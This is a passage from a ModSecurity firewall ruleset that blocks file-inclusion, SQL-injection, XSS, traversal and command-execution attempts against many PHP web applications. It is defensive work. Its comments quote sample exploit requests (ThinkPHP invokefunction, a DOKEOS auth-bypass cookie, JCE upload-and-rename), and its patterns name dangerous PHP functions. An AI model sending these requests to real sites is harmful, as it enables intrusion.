"id:310297,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcNews install.php remote command execution attempt'" SecRule REQUEST_FILENAME "/page_tail\.php" "chain,id:390282,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: page_tail RFI injection Vulnerability'" SecRule ARGS:includePath "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|^test)" ##############index.php bypass################################ SecRule REQUEST_FILENAME "index\.php" "id:333867,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:309002,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_INJECTION_RULES" # Rule 310237: phpWebLog command execution SecRule REQUEST_FILENAME "/backend/addons/links/index\.php" "phase:2,chain,id:310237,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog backend index.php command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)\:/" # Rule 310268: Remote File Inclusion Vulnerability in phpWebLog SecRule REQUEST_URI "addons/links/index\.php\?path=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310268,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpWebLog links/index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310289: PHP-Nuke remote file include attempt SecRule REQUEST_URI "/index\.php*file=*(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310289,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" #390651 #Joomla! Shoutbox Pro Component "controller" Local File Inclusion Vulnerability SecRule ARGS:controller "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|/(?:etc|proc|sys|tmp|var|home))" "phase:2,id:390651,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla! Shoutbox Pro Component controller Local File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310274: Multiple Vulnerabilities in auraCMS SecRule ARGS:query "(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,id:310274,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA index.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310337: Vortex Portal Remote File Inclusion and Path Disclosure # Vulnerabilities SecRule ARGS:act "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310337,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310392:AlstraSoft EPay Pro Remote File Include Vulnerability SecRule REQUEST_URI "/epal/index\.php\?view=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:310392,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AlstraSoft EPay Pro epal/index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310019:honeypot catch SecRule REQUEST_URI "/index\.php\?page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310580,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Page argument RFI injection attempt'" # Rule 310019: honeypot SecMarker END_PHP_JITP_INJECTION_RULES #/apps/files/ajax/scan.php?force=true&dir=&requesttoken= SecRule REQUEST_URI "/apps/files/ajax/scan\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331323,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Potential Owncloud information leakage attack blocked',logdata:'%{TX.0}'" SecRule ARGS:scan "true" "t:none,t:urlDecodeUni,t:lowercase" ##############index.php rules################################ SecRule REQUEST_FILENAME "index\.php" "id:333868,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:309003,t:none,pass,nolog,noauditlog,skipAfter:END_INDEX_PHP_JITP" #/index.php?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP SecRule ARGS:s "invokefunction" "phase:2,deny,log,auditlog,id:393753,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LFI attack blocked',chain" SecRule ARGS:function "call_" "t:none,t:urlDecodeUni,t:lowercase" SecRule ARGS:username|ARGS:password|ARGS:uid "tostring\(" "phase:2,deny,log,auditlog,id:393754,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP code injection attack blocked'" #GET /install/index.php?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.0 SecRule ARGS:install_demo_name "config_update\.php" "phase:2,deny,log,auditlog,id:393752,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LFI attack blocked'" SecRule REQUEST_URI "/index\.php" "chain,capture,phase:2,deny,log,auditlog,id:390737,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Image Upload - Arbitrary File Upload'" SecRule ARGS:option "com_simpleimageupload" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:view "upload" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:tmpl "component" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)" "t:none,t:lowercase,t:urlDecodeUni" #/index.php?loginFailed=1&sso_referer=&sso_cookie=YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30= SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333458,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DOKEOS ce30 Authentication Bypass attack blocked'" SecRule ARGS:sso_cookie "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30" "t:none" #/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b #upload-dir=/&upload-overwrite=0&upload-name=0day&action=upload #upload-dir=/&upload-overwrite=1&action=upload SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333358,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Potential JCE image manager attack',logdata:'%{TX.0}'" SecRule ARGS:option "com_jce" "t:none,t:lowercase,chain" SecRule ARGS:file "imgmanager" "t:none,t:lowercase,chain" SecRule ARGS:/upload/ ".*" "t:none,t:lowercase" #/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw #/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 #json={"fn":"folderRename","args":["/0day.gif","0day.php"]} SecRule REQUEST_URI "/index\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:333359,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JCE image attempt to rename image file to PHP attack',logdata:'%{TX.0}'" SecRule ARGS:option "com_jce" "t:none,t:lowercase,chain" SecRule ARGS:plugin "imgmanager" "t:none,t:lowercase,chain" SecRule ARGS:json "folderrename.*:.*(?:p(?:hp|l)|cgi)" "t:none,t:lowercase" #nonumbers plugin vuln #index.php?nn_qp=1&url=h SecRule ARGS:nn_qp "^1$" "phase:2,chain,id:391663,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:url "^(?:ht|f)tps?:/" chain SecRule ARGS_NAMES "curl" #probe SecRule REQUEST_URI "/index\.php\?nn_qp=1&url=https?://[a-z0-9\.\-\_\/]+$" "phase:2,id:391664,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: NoNumber Framework Joomla Plugin Vulnerability Probe',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # ibProArcade Module "user" SQL Injection Vulnerability SecRule ARGS:user "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)" "phase:2,id:391662,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Module user SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase" # Rule 310251: citrusdb directory traversal #adjust these to your system, you might need to upload SecRule REQUEST_FILENAME "tools/index\.php" "phase:2,chain,id:310251,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/index.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:load "\.\./" # Rule 310252: citrusdb upload authorization bypass (CAN-2005-0409) SecRule REQUEST_URI "citrusdb/tools/index\.php\?load=importcc\&submit=on" "phase:2,id:310252,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/index.php upload authorization bypass attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310058: ttforum remote file include attempt SecRule REQUEST_URI "forum/index\.php" "phase:2,id:310058,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttforum remote file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "template=" # Rule 310066: IdeaBox notification.php file include SecRule REQUEST_URI "/index\.php" "phase:2,id:310066,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: IdeaBox file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "(?:notification|cord)\.php" # Rule 310335: Dream4 Koobi CMS Index.PHP SQL Injection Vulnerability SecRule REQUEST_URI "/index\.php\?p=articles" "phase:2,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310335,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS index.php SQL injection attempt'" SecRule ARGS:area "'" # Rule 310346:exoops Input Validation Flaws SQL injection and XSS SecRule ARGS:viewcat "\'" "phase:2,id:310346,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310347:exoops Input Validation Flaws SQL injection and XSS SecRule REQUEST_URI "/modules/sections/index\.php\?op=viewarticle&artid=9\x2c+9\x2c+9" "phase:2,id:310347,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops sections/index.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310372:Lighthouse Development Squirrelcart SQL Injection Vulnerability SecRule ARGS:crn "\'" "phase:2,id:310372,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Lighthouse Squirrelcart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310382:InterAKT Online MX Kart Multiple SQL Injection Vulnerabilities SecRule REQUEST_URI "/index\.php\?mod=(?:pages|category)&(?:idp|id_ctg)=\'" "phase:2,id:310382,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: InterAKT MX Kart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310405: phpMyAdmin convcharset Parameter Cross Site Scripting SecRule REQUEST_URI "/phpmyadmin/index\.php" "phase:2,chain,id:310405,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin index.php convcharset parameter cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:convcharset "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # Rule 310407: cubecart SQL injection SecRule ARGS:phpsessid "\'" "phase:2,id:310407,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart index.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310425:phpbb plus SecRule REQUEST_FILENAME "/index\.php" "phase:2,chain,id:310425,t:none,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB index.php SQL injection attempt'" SecRule ARGS:c|ARGS:mark "'" "t:none,t:urlDecodeUni" # Rule 310445:squirrelcart SQL injection SecRule REQUEST_URI "index\.php" "phase:2,id:310445,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Squirrelcart index.php SQL injection attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:crn "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+(?:from|into|table|database|index|view)" # Rule 310466: eGroupWare index.php cats_app Variable SQL Injection SecRule REQUEST_URI "/index\.php\?menuaction=preferences\.uicategories\.index\&cats_app=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310466,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare index.php SQL injection attempt'" # Rule 310467: eGroupWare tts/index.php filter Variable SQL Injection SecRule REQUEST_URI "/tts/index\.php\?filter=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)" "phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310467,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare tts/index.php SQL injection attempt'" SecMarker END_INDEX_PHP_JITP ##############index.php rules################################ # #53 #FreePHPBlogSoftware "phpincdir" File Inclusion Vulnerability SecRule REQUEST_URI "default_theme\.php" "phase:2,chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - FreePHPBlogSoftware phpincdir File Inclusion Vulnerability'" SecRule ARGS:phpincdir "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|/(?:etc|proc|sys|tmp|var|home))" #OSSEC 404 stuff does this better SecRule REQUEST_URI "thisdoesnotexistahaha\.php" "phase:2,id:350023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Non-Existant File Google Recon attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 380005: phpBB Remote Code Execution Attempt SecRule REQUEST_URI "viewtopic\.php\?" "phase:2,id:380005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP session cookie attack',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:highlight "(\'|\%[a-f0-9]{4})(\.|\/|\\|\%[a-f0-9]{4}).+?(\'|\%[a-f0-9]{4})" # Rule 310008: squirrel mail spell-check arbitrary command attempt SecRule REQUEST_URI "/squirrelspell/modules/check_me\.mod\.php" "phase:2,id:310008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: squirrel mail spell-check arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "sqspell_app\[" # Rule 310009: squirrel mail theme arbitrary command attempt SecRule REQUEST_URI "/left_main\.php" "phase:2,id:310009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: squirrel mail theme arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "cmdd=" # Rule 310010: directory.php arbitrary command attempt SecRule REQUEST_URI "/directory\.php\?" "phase:2,id:310010,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: directory.php arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "\;" # Rule 310045: DNSTools administrator authentication bypass attempt SecRule REQUEST_URI "/dnstools\.php" "phase:2,id:310045,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DNSTools administrator authentication bypass attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "(?:user_dnstools_administrator|user_logged_in)=true" # Rule 310049: Blahz-DNS dostuff.php modify user attempt SecRule REQUEST_URI "/dostuff\.php\?action=modify_user" "phase:2,id:310049,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Blahz-DNS dostuff.php modify user attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310050: PHP-Wiki cross site scripting attempt SecRule REQUEST_URI "/modules\.php\?*name=wiki*\<*(script|about|applet|activex|chrome)*\>" "phase:2,id:310050,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Wiki cross site scripting attemptt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310053: shoutbox.php directory traversal attempt SecRule REQUEST_URI "/shoutbox\.php" "phase:2,id:310053,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: shoutbox.php directory traversal attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "\.\./" # Rule 310057: autohtml.php directory traversal attempt SecRule REQUEST_URI "/autohtml\.php" "phase:2,id:310057,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: autohtml.php directory traversal attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "\.\./\.\./" # Rule 310061:rolis guestbook remote file include attempt SecRule REQUEST_URI "/insert\.inc\.php*path=" "phase:2,id:310061,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: guestbook remote file include attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310064: DCP-Portal remote file include attempt SecRule REQUEST_URI "/library/lib\.php" "phase:2,id:310064,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: DCP-Portal remote file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "root=" # Rule 310067: Invision Board emailer.php file include SecRule REQUEST_URI "/ad_member\.php" "id:310067,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Board emailer.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "emailer\.php" # Rule 310068: WebChat db_mysql.php file include SecRule REQUEST_URI "/defines\.php" "id:310068,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat db_mysql.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "db_mysql\.php" # Rule 310069: WebChat english.php file include SecRule REQUEST_URI "/defines\.php" "id:310069,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat english.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "english\.php" # Rule 310070: Typo3 translations.php file include SecRule REQUEST_URI "/translations\.php" "id:310070,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Typo3 translations.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "only=\x2e" # Rule 310072: YaBB SE packages.php file include SecRule REQUEST_URI "/packages\.php" "id:310072,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaBB SE packages.php file include',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "packer\.php" # Rule 310073: newsPHP Language file include attempt SecRule REQUEST_URI "/nphpd\.php" "id:310073,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: newsPHP Language file include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "langFile" # Rule 310075:Invision Board ipchat.php file include SecRule REQUEST_URI "/ipchat\.php*root_path*conf_global\.php" "id:310075,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Board ipchat.php file include',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310077: PhpGedView PGV functions.php base directory manipulation # attempt SecRule REQUEST_URI "(?:functions|_conf|config_gedcom|authentication_index)\.php" "id:310077,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpGedView PGV functions.php base directory manipulation attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "pgv_base_directory" # Rule 310078: TUTOS path disclosure attempt SecRule REQUEST_URI "/note_overview\.php" "id:310078,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TUTOS path disclosure attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "id=" # Rule 310083:Calendar XSS SecRule REQUEST_URI "/(?:calendar|setup).php" "chain,id:310083,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Calendar XSS',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:phpc_root_path "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|(?:<|script|about|applet|activex|chrome))" # Rule 310084:phpMyAdmin Export.PHP File Disclosure Vulnerability SecRule REQUEST_URI "export\.php" "id:310084,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin Export.PHP File Disclosure Vulnerability',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:what "\.\." # Rule 310086:More PHPBB worms SecRule REQUEST_URI "/viewtopic\.php\?" "id:310086,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB worm',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS "(?:chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(?:(?:[0-9a-fa-fx]{1,3})\)" # Rule 310211: Phorum /support/common.php access SecRule REQUEST_URI "/support/common\.php" "id:310211,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum common.php direct access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310212: rolis guestbook remote file include attempt SecRule REQUEST_URI "/insert\.inc\.php" "id:310212,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Rolis guestbook insert.inc.php remote file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "path=" # Rule 310217: Invision Board ipchat.php file include SecRule REQUEST_URI "/ipchat\.php" "id:310217,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : Invision Board ipchat.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "conf_global\.php" # Rule 310219: YaBB SE packages.php file include SecRule REQUEST_URI "/packages\.php" "id:310219,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : YaBB SE packages.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "packer\.php" # Rule 310224: WAnewsletter newsletter.php file inclusion attempt SecRule REQUEST_URI "newsletter\.php" "id:310224,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : WAnewsletter newsletter.php file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "start\.php" # Rule 310225: Opt-X header.php remote file include attempt SecRule REQUEST_URI "/header\.php" "id:310225,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : Opt-X header.php remote file inclusion attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "systempath=" # Rule 310228: Dforum executable code injection attempt SecRule REQUEST_URI "/dforum/nav\.php" "chain,id:310228,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dforum nav.php3 executable code injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:page "<[[:space:]]*(?:script|about|applet|activex|chrome)" # Rule 310229: phpMyAdmin path vln SecRule REQUEST_URI "/css/phpmyadmin\.css\.php" "chain,id:310229,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin phpmyadmin.css.php file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:globals[cfg][themepath] "(?:/|\.\./)" # Rule 310231: PHPBB full path disclosure SecRule REQUEST_URI "(?:forums?|phpbb)/db/oracle\.php" "id:310231,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB oracle.php full path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310239: phpbb SecRule REQUEST_URI "admin/admin_styles\.php\?mode=addnew\&install_to=\.\./\.\./" "id:310239,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB admin_styles.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310241: phpAdsNew path disclosure SecRule REQUEST_URI "/libraries/lib-xmlrpcs.inc\.php" "id:310241,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew lib-xmlrpcs.inc.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310242: phpAdsNew path disclosure SecRule REQUEST_URI "/maintenance/maintenance-activation\.php" "id:310242,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-activation.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310243: phpAdsNew path disclosure SecRule REQUEST_URI "/maintenance/maintenance-cleantables\.php" "id:310243,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-cleantables.php path disclosure 